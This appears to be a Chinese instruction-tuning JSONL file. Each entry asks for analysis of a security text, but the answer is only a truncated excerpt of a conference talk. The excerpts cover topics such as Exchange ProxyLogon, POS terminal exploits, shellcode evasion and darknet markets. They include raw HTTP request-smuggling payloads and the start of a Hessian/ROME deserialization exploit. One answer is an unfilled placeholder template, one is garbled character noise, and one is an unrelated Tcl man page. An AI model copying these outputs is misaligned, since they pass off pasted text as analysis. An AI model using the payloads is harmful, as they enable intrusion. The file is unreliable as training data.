{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking the Hybrid Cloud Sean Metcalf (@PyroTek3) s e a n @ Trimarc Security . com TrimarcSecurity.com ABOUT  Founder Trimarc (Trimarc.io), a professional services company that helps organizations better secure their Microsoft platform, including the Microsoft Cloud and VMWare Infrastructure.  Microsoft Certified Master (MCM) Directory Services  Microsoft MVP (2017, 2019, & 2020)  Speaker: Black Hat, Blue Hat, BSides, DEF CON, DEF CON Cloud Village Keynote, DerbyCon, Shakacon, Sp4rkCon  Security Consultant / Researcher  Active Directory Enthusiast - Own & Operate ADSecurity.org (Microsoft platform security info) Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com AGENDA  Hybrid Cloud  The Cloud & Virtualization  Compromising Domain Controllers (On-Prem)  Cloud Hosted/Managed Active Directory  Amazon AWS  Microsoft Azure  Google Cloud Platform (GC)  Attacking Hybrid Components  Cloud Administration (IAM)  Compromising On-Prem Domain Controllers Hosted in the Cloud  AWS & Azure  Conclusion Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com What is Hybrid Cloud? Blend of on-prem infrastructure combined with cloud services. Typically on-prem infrastructure with some cloud hosted infrastructure (IAAS) and services (SAAS). Connection points between on-prem and cloud often dont focus on security. Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com Hybrid Cloud Scenarios On-Prem AD with Office 365 Services (SaaS)  Office 365 to host mailboxes with authentication performed by Active Directory on-prem. Cloud Datacenter  Extending the datacenter to the cloud leveraging Azure and/or Amazon AWS (IaaS). On-Prem AD with Cloud Hosted AD as Resource Forest  Trust between on-prem AD and cloud hosted AD Combination of these (or other) Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com The Cloud & Virtualization Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com Conceptually The Cloud is Virtualization (effectively)  Cloud provider Infrastructure as a Service (IaaS) architecture and", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# SpringBoot Actuator未授权访问漏洞 ## 简介 Spring Boot Actuator是Spring Boot项目中的一个模块它提供了一组用于监控和管理Spring Boot应用程序的端点这些端点可以用来检索应用程序的运行状态查看应用程序的统计数据查看应用程序中的配置信息等 此外还可以使用Actuator执行一些安全操作如关闭应用程序使用Actuator可以更好的监控管理和维护Spring Boot应用程序 其中以下是它端点 | Http | 路径 | 描述 | | :--: | :-------------: | :----------------------------------------------------------: | | get | /autoconfig | 提供了一份自动配置报告记录哪些自动配置条件通过了哪些没通过 | | get | /configprops | 描述配置属性包含默认值如何注入 Bean | | get | /beans | 描述应用程序上下文里全部的 Bean以及它们的关系 | | get | /dump | 获取线程活动的快照 | | get | /env | 获取全部环境属性 | | get | /env/{name} | 根据名称获取特定的环境属性值 | | get | /health | 报告应用程序的健康指标这些值由 HealthIndicator 的实现类提供 | | get | /info | 获取应用程序的定制信息这些信息由 info 打头的属性提供 | | get | /mappings | 描述全部的 URI 路径以及它们和控制器包含 Actuator 端点的映射关系 | | get | /metrics | 报告各种应用程序度量信息比如内存用量和 HTTP 请求计数 | | get | /metrics/{name} | 报告指定名称的应用程序度量值 | | post | /shutdown | 关闭应用程序要求 endpoints.shutdown.enabled 设置为 true默认为 false | | get | /trace | 提供基本的 HTTP 请求跟踪信息时间戳HTTP 头等 | | get | /heapdump | 获取正在运行的JVM的堆转储 | ## 环境搭建 > SpringBoot Actuator未授权访问漏洞分为1.x版本和2.x版本 ### srpingboot 2.x 下载demo代码 ``` git clone https://github.com/callicoder/spring-boot-actuator-demo.git ``` maven将项目代码构建成jar包 ``` mvn package ``` 启动Spring Boot应用程序 ``` java -jar target/actuator-demo-0.0.1-SNAPSHOT.jar ``` ![image-20220519114735057](../../.gitbook/assets/image-20220519114735057.png) 浏览器访问 [http://localhost:8080](http://localhost:8080/). ### srpingboot 1.x 使用IDEA**新建一个maven项目**修改`pom.xml`声明了一个父级依赖关系表示该项目依赖于Spring Boot的`spring-boot-starter-parent`项目版本为1.4.6.RELEASE ``` <parent> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-parent</artifactId> <version>1.4.6.RELEASE</version> </parent> <!-- Add typical dependencies for a web application --> <dependencies> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-actuator</artifactId> </dependency> </", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPOS SYSTEMSED Romantically available Hacker Outdoor day drinker Sort of an adrenaline junkie Our Target Motivation Very common high security device Companies often use on terminal encryption to justify weak security elsewhere. The companies that do care often dont have the resources to validate any security claims vendors make. What this talk is not Exhaustive comparison of all Pinpads / Card terminals Endorsement or indictment of any specific vendor Configuration or Compliance Guide What this talk is In depth dive into one line of devices Exploits! Previous Work Skimmers Previous Work Pong on payment terminals1 Previous Work Tamper resistant bypasses and emv protocol exploits2 Previous Work 2015 Survey of POS attacks (90% use default PIN)3 Previous Work Breaches Device Overview Linux under the hood (V/OS) 400 MHz, ARM11 32-bit RISC processor ARMv6 instruction set :( 512MB (256MB Flash, 256MB SDRAM) 4 or 7 inch display!!! ! Connectivity Varies by device configuration -Ethernet (optional) -Wifi (optional) -Bluetooth (optional) -USB host (optional) -RS-232 (optional) -Old IO methods from mx800 series Generally expose similar functionality Remote Attack Surface 2 TCP ports open -Services expect XML messages DHCP (sometimes) Normal Operation Generally frmAgent.exe running as usr1 Only communicates over configured interfaces - Generally USB or Ethernet Daemons provide IPC for privileged operations Physical Attack Surface Smart Card Reader / Mag Usb (Host) USB(9600 Baud Serial) Com ports SD card slot BERG Disassembly Tamper resistant hardware Likes to wipe itself when opened up Not necessary to get firmware Warranty Voided! Administrator Mode Press 1 + 5 + 9 Enter pin Massively increased attack surface! Diagnostic Info! Install Software Updates! Software Update Manual Interaction required unless using PAYware :( Updates must be signed prior to installation Load Encryption Keys! Manage Config Settings! MOAR Config Settings! File Manager! Exploit!!! Priv-Esc Attack Surface No SUID ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDam Control Substation Gas Distribution Petrochemical http://www.openplcproject.com Editor GUI Builder Raspberry Pi UniPi Linux (soft-PLC) Windows (soft- PLC) ESP8266 Arduino PiXtend FreeWave Zumlink Slave ID (1 byte) F. Code (1 byte) Data (n bytes) CRC (2 bytes) Slave ID (1 byte) F. Code (1 byte) Data (n bytes) CRC (2 bytes) Transaction ID (2 bytes) Protocol ID (2 bytes) Length (2 bytes) Unit ID (1 byte) F. Code (1 byte) Data (n bytes) Interruption Interception Modification Injection Transaction ID Protocol ID Length Unit ID Func. Code Coil Address Status Source: lirasenlared.xyz Source: lirasenlared.xyz Thiago Alves www.openplcproject.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nProxyLogon is Just the Tip of the Iceberg A New Attack Surface on Microsoft Exchange Server! Orange Tsai Orange Tsai  Orange Tsai, focusing on Web and Application 0-day research  Principal Security Researcher of DEVCORE  Captain of HITCON CTF Team  Speaker of Security Conferences  Black Hat USA & ASIA / DEFCON / HITB / HITCON   Selected Awards and Honors:  2017 - 1st place of Top 10 Web Hacking Techniques  2018 - 1st place of Top 10 Web Hacking Techniques  2019 - Winner of Pwnie Awards \"Best Server-Side Bug\"  2021 - Champion and \"Master of Pwn\" of Pwn2Own Disclaimer All vulnerabilities disclosed today are reported responsibly and patched by Microsoft Why Target Exchange Server? 1. Mail servers always keep confidential secrets and Exchange Server is the most well-known mail solution for enterprises and governments worldwide 2. Has been the target for Nation-sponsored hackers for a long time (Equation Group) 3. More than 400,000 Exchange servers exposed on the Internet according to our survey Exchange Security in the Past Years  Most bugs are based on known attack vectors but there are still several notable bugs: 1. EnglishmansDentist from Equation Group:  Recap: A only practical and public pre-auth RCE in the Exchange history. Unfortunately, the arsenal only works on an ancient Exchange Server 2003 2. CVE-2020-0688 Hardcoded MachineKey from anonymous working with ZDI:  Recap: A classic .NET deserialization bug due to a hardcoded cryptography key. This is also a hint shows Microsoft Exchange is lacking of security reviews Our Works  We focus on the Exchange architecture and discover a new attack surface that no one proposed before. That's why we can pop 0days easily!  We discovered 8 vulnerabilities that covered server-side, client-side, and crypto bugs through this new attack surface, and chained into 3 attacks: 1. ProxyLogon: The most well-known pre-auth RCE chain 2. ProxyOracle: A plaintext-password recovery attacking chain 3. ProxyShell: The pre-auth RCE chain we ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@Y4tacker 2022虎符CTF-Java部分 写在前 代码基于marshalsec项基础上进修改 正 本我是不太懂hessian的反序列化概去上搜了下配合ROME利的思路如果反序 列化map对象在逻辑后通过put操作从触发对key调hashCode打ROME这不清 楚可以看看ROME利链以及hessian反序列化的些简单东西 先简单看下docker可以看到会导致不能出 version: '2.4' services: nginx: image: nginx:1.15 ports: - \"0.0.0.0:8090:80\" restart: always volumes: - ./nginx.conf:/etc/nginx/conf.d/default.conf:ro networks: - internal_network - out_network web: build: ./ restart: always volumes: nginx.conf - ./flag:/flag:ro networks: - internal_network networks: internal_network: internal: true ipam: driver: default out_network: ipam: driver: default server { listen 80; server_name localhost; location / { root /usr/share/nginx/html; index index.html index.htm; proxy_pass http://web:8090; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } } 利SignedObject实现次反序列化 既然不出那就法配合JNDI去利了上主流的利后尝试了TemplatesImpl在 Hessian的些限制下(有空去看源码)导致被 transient 修饰的 _tfactory 对象法 写造成空指针异常为什么呢,看图可以看到不仅仅是被 transient 修饰同时静态变 量也不这导致另个利链不能打这不提 之后解决思路就是找个次反序列化的点触发原反序列化即可最后找到 个 java.security.SignedObject#SignedObject ,的getObject可以触发 public Object getObject() throws IOException, ClassNotFoundException { // creating a stream pipe-line, from b to a ByteArrayInputStream b = new ByteArrayInputStream(this.content); ObjectInput a = new ObjectInputStream(b); Object obj = a.readObject(); b.close(); a.close(); return obj; } 这时候聪明的你定想问为什么原反序列化就可以恢复这个 trasient 修饰的变量呢 答案如 下 com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl#readObject , 重写了readOBject法 因此得到下简单的payload下payload有些地还可以完善变得更好但是我懒 package marshalsec; import com.caucho.hessian.io.Hessian2Input; import com.caucho.hessian.io.Hessian2Output; import com.rometools.rome.feed.impl.EqualsBean; import com.rometools.rome.feed.impl.ObjectBean; import com.rometools.rome.feed.impl.ToStringBean; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.tr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSECURITY PAPER Preparation Date: 11 Dec 2016 Art of Anti Detection  3 Shellcode Alchemy Prepared by: Ege BALCI Penetration Tester ege.balci<at>invictuseurope.com INVICTUS 2 Security Paper TABLE OF CONTENT 1. Abstract:.....................................................................................................................................................3 2. Terminology..............................................................................................................................................3 3. Introduction.............................................................................................................................................. 4 4. Basic Shellcoding.....................................................................................................................................5 5. Solving The Addressing Problem....................................................................................................... 5 6. Hash API...................................................................................................................................................10 7. Encoder/Decoder Design................................................................................................................... 11 8. Anti Exploit Mitigations......................................................................................................................16 9. Bypassing EMET.....................................................................................................................................17 10. References:...........................................................................................................................................18 INVICTUS 3 Security Paper 1. Abstract: This paper will deal with subjects such as basic shellcoding concepts, assembly level encoder/decoder design and few methods for bypassing anti exploit solutions such as Microsofts Enhanced Mitigation Experience Toolki", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHTTP DESYNC ATTACKS SMASHING INTO THE CELL NEXT DOOR James Kettle The Fear Theory Q) What topic am I really scared of? A) HTTP Request Smuggling Hiding Wookiees in HTTP First documented by Watchfire in 2005 \"You will not earn bounties\" \"You will certainly not be considered like a white hat\"  Theory & Methodology  Exploitation Case Studies  Defence  Q&A Outline Keepalive Keepalive, desynchronized Desynchronizing: the classic approach POST / HTTP/1.1 Host: example.com Content-Length: 6 Content-Length: 5 12345G Unknown method GPOST Frontend sees this Backend sees this POST / HTTP/1.1 Host: example.com  Desynchronizing: the chunked approach POST / HTTP/1.1 Host: example.com Content-Length: 66 Transfer-Encoding: chunked 0 GPOST / HTTP/1.1  Frontend sees this Backend sees this Unknown method GPOST Desynchronizing: the TE.CL approach POST / HTTP/1.1 Host: example.com Content-Length: 3 Transfer-Encoding: chunked 6 PREFIX 0 POST / HTTP/1.1 Host: example.com Frontend sees this Backend sees this Forcing desync If a message is received with both a Transfer-Encoding header field and a Content- Length header field, the latter MUST be ignored.  RFC 2616 #4.4.3 Transfer-Encoding : chunked Transfer-Encoding: xchunked GET / HTTP/1.1 Transfer-Encoding: chunked Transfer-Encoding: chunked Content-Length: 123 Transfer-Encoding : chunked Transfer-Encoding: chunked Transfer-Encoding: x Transfer-Encoding:[tab]chunked X: X[\\n]Transfer-Encoding: chunked Methodology Detecting desync POST /about HTTP/1.1 Host: example.com Transfer-Encoding: chunked Content-Length: 6 0 X CL.CL: backend response TE.TE: backend response TE.CL: timeout CL.TE: socket poison POST /about HTTP/1.1 Host: example.com Transfer-Encoding: chunked Content-Length: 6 3 abc Q CL.CL: backend response TE.TE: frontend response TE.CL: frontend response CL.TE: timeout Confirming desync POST /search HTTP/1.1 Content-Length: 51 Transfer-Encoding: zchunked 11 =x&q=smuggling&x= 0 GET /404 HTTP/1.1 X: X POST /search HTTP/1.1 Content-Leng", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nZhanlu Lab, Tencent Inc. 针对Docker容器网络的ARP欺骗 与中间人攻击 演讲人王凯 Kame Wang 2019 关于我  王凯Kame Wang  腾讯安全湛泸实验室高级研究员  中国科学院大学信息安全博士  研究兴趣包括云安全移动安全区块链自动化漏洞挖掘 PART 01 研究背景 目录 CONTENTS PART 02 本地测试 PART 03 云端测试 PART 04 讨论与总结 01 02 03 04  Docker及其虚拟网络  ARP欺骗与中间人攻击 PART.01 研究背景 CLICK ADD RELATED TITLE TEXT, AND CLICK ADD RELATED TITLE TEXT, CLICK ADD RELATED TITLE TEXT, CLICK ON ADD RELATED TITLE WORDS. 容器技术简介  共享底层操作系统的进程间隔离技术  底层技术NamespaceCgroup   优缺点 (vs 虚拟化技术) ü 优点低成本高效率易部署 ü 缺点共享内核隔离不充分 Docker容器网络  系统向Docker实例提供网络通信能力 ① 宿主系统虚拟网桥 (bridge); ② 宿主系统创建一对虚拟网口 ③ 将虚拟网口分别添加到Docker实例和虚拟网桥. ARP欺骗  网络通信基于IP地址 vs 网卡接受数据基于Mac地址  ARP表IP地址 -> MAC地址  ARP查询与反馈  ARP欺骗ARP数据包真实性无法验证 / # arp -a ? (172.17.0.4) at 02:42:ac:11:00:04 [ether] on eth0 ? (172.17.0.2) at 02:42:ac:11:00:04 [ether] on eth0 ? (172.17.0.1) at 02:42:fa:4f:be:25 [ether] on eth0 / # arp -a ? (172.17.0.4) at 02:42:ac:11:00:04 [ether] on eth0 ? (172.17.0.1) at 02:42:fa:4f:be:25 [ether] on eth0 中间人攻击  以ARP欺骗为基础可实现局域网内的中间人攻击 例欺骗受害者使其ARP缓存表中网关IP对应Mac地址遭到篡改  中间人攻击的传统实现思路 使用原始套接字在数据链路层进行数据帧的收发监控和修改  攻击场景举例 钓鱼攻击会话劫持Https中间人攻击 在Docker容器网络里也是这样的吗  测试环境搭建  ARP欺骗的实现方法及成功条件  中间人攻击的实现方法及成功条件 PART.02 本地测试 CLICK ADD RELATED TITLE TEXT, AND CLICK ADD RELATED TITLE TEXT, CLICK ADD RELATED TITLE TEXT, CLICK ON ADD RELATED TITLE WORDS. 本地测试环境的搭建  创建3个Docker容器实例 (Ubuntu映像) ① 正常服务No.1正常Http服务器; ② 受害者No.2向正常服务器发送Http请求; ③ 攻击者No.3进行ARP欺骗和中间人攻击  中间人攻击PoC效果 实现服务内容的篡改 // 直接请求正常服务 / # wget -O - 172.17.0.2 Connecting to 172.17.0.2 (172.17.0.2:80) hello from NORMAL server. // 直接请求攻击者的恶意服务 / # wget -O - 172.17.0.4 Connecting to 172.17.0.4 (172.17.0.4:80) hello from MIMA server. 基于设备 VS 基于Docker的攻击 Linux Kernel Attacker Process Linux Kernel (Bridge) Docker Instance 1 Docker Instance 2 Docker Instance 3 ARP欺骗的实现方法 ① 创建原始套接字操控数据链路层数据 ② 构造数据帧头部 目的Mac为受害者源Mac为攻击者 ③ 构造ARP包数据即数据帧内容 目的IP为受害者IP源IP为伪造目标正常服务器IP ④ 重复发送上述恶意构造的数据包. Linux Kernel Attacker Process Linux Kernel (Bridge) Docker Instance 1 Docker Instance 2 Docker Instance 3 ARP欺骗的成功条件 原始套接字的使用条件 ① UID0 (i.e. Roo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGrifter and Metacortex @grifter801 @metacortex A TOUR THROUGH THE DARKSIDE OF THE INTERNET THESE GUYS  Grifter (@grifter801)  DEF CON Goon  Multiple time DEF CON Speaker  DC801 Founder  Founder of 801 Labs Hacker Space in SLC  Metacortex (@metacortex)  DC801 Organizer  Founder of the 801 Labs Hacker Space in SLC  Seen us running around: DEF CON, Black Hat, BSides-SLC, SaintCON, ToorCon, ShmooCon WARNING!!  We WILL talk about some questionable content.  We can not promise that you wont be offended.  Content may include but not limited to  Drugs  Pornography  Counterfeit Material  Murder for Hire (hit men)  Money Laundering  Arms  Hacking  Cracking  Profanity HERE IS WHAT WE WILL TALK ABOUT  Tor  Connecting to it  Using it  Onion Sites  Bitcoin  How Bitcoin works  How to use it  Mining bitcoin HERE IS WHAT WE WILL TALK ABOUT  How to find what you are interested in  Darknet Forums  Hacker/Carder Forums  Darknet Search Engines  Darknet Marketplaces  Purchasing things you are interested in  How to stay anonymous when doing so  Tips and tricks to be more anonymous and secure than nubs TOR*  The Onion Router  Primary Purpose: Anonymize Internet activity  Series of routers that anonymously forward traffic  Routers only knowledgeable about 1 hop in either direction * Caution: Search of software classifies you as an Extremist in the eyes of the NSA, but honestly, what doesnt? HOW DO YOU CONNECT TO THE TOR NETWORK  CLI Daemon  apt-get install tor  /etc/tor/torrc  /etc/tor/tor-tsocks.conf  Starts socks5 proxy that you can point applications towards  Defaults to port 9050  TorBrowser  Simple executable  Launches portable Firefox browser with select plugins CLI CONNECTION  /etc/init.d/tor start  Point Browser to 9050  Visit http://check.torproject.org for confirmation  Configure tor through /etc/tor/torrc  Set up hidden services  Set up the port to listen on  Setup basic access lists for allowing other systems to connect to tor through you TORBROWSER  Download at https://www.torp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请解释社会工程学的原理和防护方法", "input": "", "output": "社会工程学是一种常见的网络安全威胁。攻击原理：[具体原理说明]。防护措施：1. [防护方法1] 2. [防护方法2] 3. [防护方法3]", "category": "security_knowledge", "source": "manual"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Great Hotel Hack Adventures in attacking hospitality industry Etizaz Mohsin https://etizazmohsin.com Disclaimer No hotels were harmed during making of this presentation Do not try this at home! Images Courtesy: ANTlabs & INTSIGHTS What this talk is not about What this talk is about Biggest threats are simple not sophisticated Previous Research Agenda  Why Do hackers attack hotel  Attack surface walkthrough  Common attack vectors  Who are threat actors  Notable Data breaches  What led to my research  Demo NSA style hack  Mitigations Security Point Products  Network Security  Endpoint Security  Data Security Supreme excellence consists in breaking the enemy's resistance without fighting  Sun Tzu Why Do Threat Actors attack Hotel ?  Second largest number of breaches after retail sector  Prominent hotel brands attacked repeatedly  Collect sensitive, valuable and varied data  Manage large number of financial transactions  Uses loyalty programs to encourage repeated visits Hotel attack surface  Large quantity of diverse endpoints  Access to mothership  Lack of employee security awareness  Undefined security responsibilities  High exposure to third parties  Attacks on Point of Sale  Spear phishing attacks  WIFI network attack  DDOS and Botnet attacks  Internet of Things attacks  Brand Impersonation  Customer targeted attacks  Ransomware Attack Vectors Threat Actors  APT28 Fancy Bear Threat Actors  Darkhotel APT Notable Data Breaches Disclaimer Once Again! How did this all start? Disclosure Timeline  2018-10-31: First vendor notification  immediate response  2018-11-12: Technical details sent to vendor  2018-12-10: Vendor questions feasibility  2018-12-15: Proof of concept sent  2018-12-17: Vendor acknowledges vulnerability  2018-12-20: Vendor discusses update plans  2019-04-01: Vendor assures patching Hmm ?? Wi-Fi Captive Portal  Radius  LDAP  Voucher  SMS  PMS  Social Login Billing Feature  Credit Card  PMS (FIAS) Management  Web portal  Role based access  DNS server ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n!  \"  # $ %  & ' ( ( # % ) % * * + , - . / 0 1 . 2 , 3 - 0 / 0 4 5 2 . 6 7 0 8 - , 5 8 , 7 0 8 6 5 1 . 9 , 4 2 . , / 0 3 8 - 0 : . 2 . 7 - 9 0 8 5 7 . ; 3 5 < = / . 8 - 7 0 / < , 9 . 1 > 5 - ? @ . ? 5 7 2 . 6 5 8 - ? . < , 6 - A B 2 - ? 0 3 C ? 6 0 / . 0 : - ? . 6 . . 2 . 7 - 9 0 8 5 7 1 . @ 5 7 . 6 , 9 . 3 6 . 9 @ 5 6 5 4 2 . , < < 2 5 , 8 7 . 6 D 6 3 7 ? , 6 . 8 - . 9 - , 5 8 / . 8 - , 8 1 8 , @ 5 C , - 5 0 8 6 E 6 = - . / 6 D / , 8 E , 9 . 1 . @ 5 7 . 6 3 8 1 . 9 - ? . ? 0 0 1 5 8 7 2 3 1 5 8 C 7 0 8 - 9 0 2 2 . 9 6 : 0 9 : 3 . 2 5 8 F . 7 - 5 0 8 D , 8 - 5 = 2 0 7 G 4 9 , G . 6 D , 8 1 , 5 9 4 , C 6 A H ? . 8 3 / 4 . 9 0 : 1 . @ 5 7 . 6 3 6 . 1 D , 6 > . 2 2 , 6 - ? . 6 0 = < ? 5 6 - 5 7 , - 5 0 8 D @ . 9 6 , - 5 2 5 - E D , 8 1 < 9 0 C 9 , / / , 4 5 2 5 - E 0 : - ? . 1 . @ 5 7 . 6 5 6 7 0 8 - 5 8 3 , 2 2 E 5 8 = 7 9 . , 6 5 8 C A I 0 - 6 3 9 < 9 5 6 5 8 C 2 E D - ? . 6 . 1 . @ 5 7 . 6 , 9 . , 2 6 0 8 . - > 0 9 G . 1 D , 2 2 0 > 5 8 C - ? . / - 0 7 0 / / 3 8 5 7 , - . > 5 - ? . , 7 ? 0 - ? . 9 , 8 1 > 5 - ? , 1 1 5 - 5 0 8 , 2 . ; 3 5 < / . 8 - 0 3 - 6 5 1 . - ? . @ . ? 5 7 2 . : 0 9 1 5 , C 8 0 6 - 5 7 6 , 8 1 7 0 8 J C 3 9 , - 5 0 8 A B 3 - 0 / 0 - 5 @ . . 2 . 7 - 9 0 8 5 7 1 . @ 5 7 . 6 . 8 , 4 2 . - ? . 2 0 C C 5 8 C 0 : @ . ? 5 7 2 . 6 . 8 6 0 9 1 , - , D < , 9 = - 5 7 3 2 , 9 2 E 5 8 - ? . . @ . 8 - 0 : , 8 , 7 7 5 1 . 8 - 0 9 , 8 . , 9 / 5 6 6 A + 5 - - 2 . 5 8 : 0 9 / , - 5 0 8 , 4 0 3 - - ? . 6 . 2 0 C C 5 8 C 1 . @ 5 7 . 6 5 6 9 . , 1 5 2 E , @ , 5 2 , 4 2 . D 4 . 7 , 3 6 . - ? 0 6 . > 5 - ? - ? . 5 8 : 0 9 / , - 5 0 8 K @ . ? 5 7 2 . , 8 1 , : - . 9 / , 9 G . - - 0 0 2 / , 8 3 : , 7 - 3 9 . 9 6 L , 9 . / , G 5 8 C , 8 . M 0 9 - - 0 G . . < - ? . 5 8 : 0 9 / , - 5 0 8 1 5 N 7 3 2 - : 0 9 - ? . < 3 4 2 5 7 - 0 0 4 - , 5 8 A KO > , 6 < . 9 6 0 8 , 2 2 E 1 . 8 5 . 1 / . / 4 . 9 = 6 ? 5 < 5 8 - ? . 0 8 2 E 1 5 6 7 3 6 6 5 0 8 C 9 0 3 < O , / , > , 9 . 0 : 0 8 - ? 5 6 6 3 4 F . 7 - 4 . 7 , 3 6 . O , / 8 0 - 2 , > . 8 : 0 9 7 . / . 8 - D O 1 0 8 0 - 0 > 8 , ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# slow (cloud 450) > Maybe if you run this on a big enough, strong enough computer for long enough, > you'll get it to print the flag! > The NSA might have a computer suitable for this :) This task, although it was in the `cloud` category, was more of an reverse engineering one. The main function was very simple, just `printf(\"FLAG{%lu}\\n\", real_main());`. So we had to find out what that function returns. Note that we couldn't simply run the binary - it throws `std::bad_alloc` immediately. Reverse engineering of the biggest function of the binary shows it is very sequential and repetitive code. First, it allocates two vectors of complex numbers - their size was 1LL<<48 though, far too much too allocate, let alone initialize. After initialization (0+0i everywhere, and 1+0i in the very first cell), there was a couple of calls to a certain function - I called it `split`. It took one parameter, and what it did was adding, subtracting, and multiplying some numbers in the vector. After reading some quantum mechanics articles (and solving the other quantum challenge), I believe it applied Hadamard gate to the system - not that it was important to the solution... One thing I noticed after reimplementation of the function in C++, is that the number of non-zero cells doubles after each call to `split`. This property will be important later on. After around 20 or so `split`s, the only remaining repeating patterns were of one of two types: `swap`, taking two arguments (say `a` and `b`), and swapping each index of array with `a`th bit set, with its corresponding cell, with bit `b` flipped. I believe this is controlled swap gate. The other repeating function was `rotate`, which multiplied each cell with certain bit set by (0+1i), or simply shifted phase by 90 degrees. Finally, the code calculated a kind of checksum of the vector and returned the result to be printed as flag. Unfortunately, some of the calls to the functions I mentioned were inlined, which made it much more diffic", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmacOS/iOS Kernel Debugging and Heap Feng Shui Min(Spark) Zheng @ Alibaba Mobile Security Outline Alibaba Security  Introduction  macOS Two Machine Debugging  iOS Kernel Debugging  Debugging Mach_voucher Heap Overflow  Traditional Heap Feng Shui  Port Feng Shui  Conclusion Whoami  SparkZheng @ Twitter蒸米spark @ Weibo  Security Expert @ Alibaba  CUHK PhD, Blue-lotus and Insight-labs  Worked in FireEye, Baidu and Tencent  iOS 9.2.1/9.3.5 OverSky Jailbreak (Private) Alibaba Security  Co-author: Xiangyu Liu, Security Engineer @ Alibaba  Special thanks to: yang dian, aimin pan, jingle, luca, marcograss, windknown, liangchen, qoobee, etc. Introduction of macOS/iOS Kernel  XNU is the computer operating system kernel developed by Apple Inc. It is used in the iOS/macOS operating system and released as free and open-source software as part of the Darwin operating system. XNU is an abbreviation of X is Not Unix.  XNU for macOS is open source. It can be compiled and debugged.  XNU for iOS is not open source. It can not be compiled and debugged (officially), but most of its implementation is same as macOS. Alibaba Security Outline Alibaba Security  Introduction  macOS Two Machine Debugging  iOS Kernel Debugging  Debugging Mach_voucher Heap Overflow  Traditional Heap Feng Shui  Port Feng Shui  Conclusion Two-machine Debugging of macOS  To do a good job, one must first sharpen one's tools.  Machine: two MacBooks or one MacBook with VM (The system versions can be different).  Equipments for two-machine debugging: Thunderbolt to FireWire * 2, Belkin FireWire 800 9/9-Pin cable * 1, Thunderbolt 3 (USB-C) to Thunderbolt 2 * 2 for new 2016 MacBook. Alibaba Security Two-machine Debugging of macOS  Two MacBooks need to install KDK (Kernel Debug Kit).  After connection with FireWare cable, execute fwkdp on the host MacBook.  Copy the kernel.development of KDK to the System/Library/Kernels/ folder on the debug MacBook and then execute the following commands: sudo nvram boot-args =debug=0x147 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1993 The Regents of the University of California. '\\\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: read.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of 